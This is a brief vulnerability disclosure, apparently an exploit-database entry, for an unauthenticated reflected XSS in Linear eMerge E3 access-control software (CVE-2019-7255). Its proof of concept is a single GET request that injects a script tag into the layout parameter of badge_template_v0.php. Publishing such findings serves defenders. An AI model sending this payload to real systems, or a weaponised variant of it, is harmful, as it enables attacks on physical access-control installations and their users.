Linear eMerge E3 Unauthenticated Reflected XSS
Affected version: <=1.00-06
CVE: CVE-2019-7255
Advisory: https://applied-risk.com/resources/ar-2019-005

Discovered by Gjoko 'LiquidWorm' Krstic

PoC:
GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1